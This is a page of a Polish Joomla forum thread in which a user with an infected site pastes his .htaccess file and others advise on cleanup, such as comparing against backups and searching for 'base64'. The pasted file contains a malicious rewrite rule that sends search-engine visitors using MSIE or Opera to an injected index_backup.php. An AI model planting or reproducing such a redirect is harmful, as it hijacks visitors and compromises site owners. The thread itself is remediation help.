Informacje na tym serwisie o bezpieczeństwie - plik .htaccess - Strona 2
Strona 2 z 2 PierwszyPierwszy 12
Wyniki 11 do 19 z 19

Temat: Informacje na tym serwisie o bezpieczeństwie - plik .htaccess

  1. #11
    Bywalec ugly kid joe awatar
    Dołączył
    09-11-2012
    Skąd
    C:\WINDOWS\Wirusy i Trojany
    Wpisy
    342
    Punkty
    18

    Domyślny

    ja pierniczę, jeden magister - pisze magisterkę o bezpieczeństwie i nie wie o czym, drugi - inżynier będzie budował sklep ze zrobionych już elementów.

    świat oszalał, idę siku !
    moje nowe alter ego

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #12
    Wiarus mjmartino awatar
    Dołączył
    03-12-2007
    Skąd
    Będzin /k Katowic
    Wpisy
    2 751
    Punkty
    212

    Domyślny

    @ugly kid joe i takich właśnie będziemy mieć inż. i mgr ... Jeśli takie podejście mają to raczej ciężko będzie się obronić.. Już lepszym rozwiązaniem było zlecić komuś napisanie i wykucie tej pracy na blachę heh.. Do czego oczywiście nie namawiam!
    Ale pojęcie trzeba mieć a po drugie dobrać sobie promotora który będzie chętny do pomocy.. bo są tacy co zlewają wszystko i radź pan sobie sam.
    Całe szczęście że to wszystko już za mną
    ================================
    Administracja Joomla, Nowości, Artykuły Pomocne Administratorom, Usługi
    >>> https://joomlaguru.pl <<<
    Szkoła Joomla Guru (Kursy Online)
    >>> https://szkola.joomlaguru.pl <<<
    ================================

  4. #13
    Bywalec ugly kid joe awatar
    Dołączył
    09-11-2012
    Skąd
    C:\WINDOWS\Wirusy i Trojany
    Wpisy
    342
    Punkty
    18

    Domyślny

    najgorsze jest to, że on tę pracę obroni, bo pewnie absolwent szkoły niepublicznej. ja nadal wierzę, że te publiczne realizują jeszcze jakiś program ... ale najśmieszniejsze jest to, że taki inżynier jest w stanie wysiudać z pracy przy pos'ie - w jednym z barów z bułką i kotletem - pracownika, który jest rzetelny, ale nie jest inżynierem, wszak do pracy z pos'em trzeba mieć pojęcie w co klikać i jak zrobić podsumowanie dnia.
    moje nowe alter ego

  5. #14
    Nowicjusz
    Dołączył
    13-04-2013
    Wpisy
    13
    Punkty
    2

    Domyślny

    Cytat Wysłane przez zwiastun Zobacz wiadomość
    Wracając do Twojej gotowości pomocy: nie wiem, jaki jest zakres Twojej pracy, ale jeśli dotyczy ona bezpieczeństwa Joomla, to pełniejszego i aktualniejszego zbioru materiałów, niż jest tutaj: http://wiki.joomla.pl/Kategoria:Bezpieczeństwo nie znajdziesz.
    Dzięki za podanie tej strony. Ona dużo mi pomoże.

    Niebawem dam znać jak mi poszło z pracą.. i czy wyjdzie coś z Pana pomysłu czy jednak nie dam rady.

  6. #15
    Debiutant
    Dołączył
    01-03-2009
    Wpisy
    3
    Punkty
    10

    Domyślny

    w tym temacie bo sprwa dotyczy pliku htaccess mianowicie zauważyłem że obecnie plik wygląda tak:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikip edia|qq|excite|altavista|msn|netscape|aol|hotbot|g oto|infoseek|mamma|alltheweb|lycos|search|metacraw ler|bing|dogpile|facebook|twitter|blog|live|myspac e|linkedin|flickr|filesearch|yell|openstat|metabot |gigablast|entireweb|amfibi|dmoz|yippy|walhello|we bcrawler|jayde|findwhat|teoma|euroseek|wisenut|abo ut|thunderstone|ixquick|terra|lookle|metaeureka|se archspot|slider|topseven|allthesites|libero|clicke y|galaxy|brainysearch|pocketflier|verygoodsearch|b ellnet|freenet|fireball|flemiro|suchbot|acoon|deva ro|fastbot|netzindex|abacho|allesklar|suchnase|sch nellsuche|sharelook|sucharchiv|suchbiene|suchmasch ine|infospace|web|websuche|witch|wolong|oekoportal |freenet|arcor|alexana|tiscali|kataweb|voila|sfr|s tartpagina|kpnvandaag|ilse|wanadoo|telfort|hispavi sta|passagen|spray|eniro|telia|bluewin|sympatico|n lsearch|atsearch|klammeraffe|sharelook|suchknecht| ebay|abizdirectory|alltheuk|bhanvad|daffodil|click 4choice|exalead|findelio|gasta|gimpsy|globalsearch directory|hotfrog|jobrapido|kingdomseek|mojeek|sea rchers|simplyhired|splut|thisisouryear|ukkey|uwe|f riendsreunited|jaan|qp|rtl|apollo7|bricabrac|findl oo|kobala|limier|express|bestireland|browseireland |finditireland|iesearch|kompass|startsiden|confex| finnalle|gulesider|keyweb|finnfirma|kvasir|savio|s ol|startsiden|allpages|america|botw|chapu|claymont |clickz|clush|ehow|findhow|icq|westaustraliaonline )\.(.*)
    RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
    RewriteCond %{REQUEST_FILENAME} !/index_backup.php
    RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
    </IfModule>

    Udało mi sie już doczytać że strona został zainfekowana pousuwałem już plik index_backup.php oraz inne podejrzane. teraz Chiałbym wyczyscić lub napisać poprawnie kod w pliku htaccess gdzie mógłbym znaleźć taki gotowy, kóry pasłowałby do strony - system jommla 1,5 czy wystarczyłoby abym podmienił ten plik z katalogu głownego i zamienił z txt. Czy mógłbym jednak znaleść taki kod źródłowy, kóry zabezpieczył by stronę, przed podobnymi atakami? czy ogólnie zapomnieć o sprawie ( bo ataki będą sie powtarzać) i starać się zrobić migrację do nowszej wersji joomli.

  7. #16
    Debiutant
    Dołączył
    01-03-2009
    Wpisy
    3
    Punkty
    10

    Domyślny

    Plik htaccess znalazłem

  8. #17
    Wyga alex51 awatar
    Dołączył
    16-01-2007
    Skąd
    Kamień Pomorski
    Wpisy
    3 369
    Punkty
    485

    Domyślny

    Oprócz wskazanego i jak sądzę podmienionego pliku .htaccess sprawdź czy w głównym katalogu masz wgrane jeszcze inne obce pliki. Jeden z nich jest wskazany w tym cytowanym kodzie - index_backup.php. Być może znajdą się jeszcze inne, odpowiedzialne m.in. za wysyłanie spamu z zainfekowanej witryny. Najprędzej zlokalizujesz te pliki porównując zawartość serwera z posiadaną wcześniejszą kopią bezpieczeństwa witryny lub z zawartością paczki instalatora Joomla!. Możesz też prześledzić zawartość serwera pod kątem aktualizacji jego plików w czym pomocnym może być ten skrypt. Wgranie go do głównego katalogu serwera i wywołanie w przeglądarce pokaże listę ostatnio modyfikowanych lub wgrywanych plików, uszeregowaną według dat.
    Możesz też sprawdzić pliki serwera przeszukując je na obecność w ich zawartości frazy "base64". Obecność takiej frazy z dużą dozą prawdopodobieństwa świadczy o wstawieniu takiego pliku przez włamywacza.

  9. #18
    Debiutant
    Dołączył
    01-03-2009
    Wpisy
    3
    Punkty
    10

    Domyślny

    Wielkie dzięki będę próbował to wszystko naprawić.
    Mam pytanie w jaki sposób mógłbym przeszukiwać pliki po ich zawartości, bo na pewno bu mi to ułatwiło wyszukiwanie i ewentualnie wykasowanie plików obecnie muszę wkochdzić do każdego katalogu i ręcznie usuwać lub je modyfikować. Czy jest to uzależnione od dostawcy serwera - cy są mozę programy, kóre dają taką możliwość korzystam z winscp do połączenia?

  10. #19
    Wyga alex51 awatar
    Dołączył
    16-01-2007
    Skąd
    Kamień Pomorski
    Wpisy
    3 369
    Punkty
    485

    Domyślny

    By przeszukać zawartość plików trzeba je najpierw pobrać z serwera, najlepiej za pomocą komponentu Akeeba, tworząc zarazem kopię bezpieczeństwa witryny, w tym przypadku lepiej by była ona zrobiona w formacie archiwum zip (dla łatwiejszego rozpakowania, choć zalecany format jpa też można rozpakować, ale specjalnym narzędziem - Akeeba eXtract Wizard). Tak przygotowaną kopię bezpieczeństwa należy pobrać i rozpakować na dysku swojego komputera i przeszukać za pomocą np. Total Commandera (Polecenia=>Znajdź=>opcja Znajdź tekst), wskazując w wyszukiwaniu podany tekst base64.

Strona 2 z 2 PierwszyPierwszy 12

Podobne tematy

  1. Luka w bezpieczeństwie w PHP
    przez Raveren na forum Ogłoszenia i komunikaty
    Odpowiedzi: 1
    Ostatni post/autor: 06-05-2012, 17:56
  2. rzecz o bezpieczeństwie ... (?)
    przez kurtz na forum Ogłoszenia i komunikaty
    Odpowiedzi: 2
    Ostatni post/autor: 17-05-2010, 09:18
  3. Odpowiedzi: 12
    Ostatni post/autor: 08-05-2009, 17:38
  4. O bezpieczeństwie Joomla w Dzienniku Internetowym
    przez zwiastun na forum Ogłoszenia i komunikaty
    Odpowiedzi: 2
    Ostatni post/autor: 14-12-2008, 02:40
  5. Przydatne info o bezpieczeństwie CMS
    przez kmilek na forum Pomysły, sugestie, propozycje, oczekiwania
    Odpowiedzi: 1
    Ostatni post/autor: 06-05-2008, 02:08

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •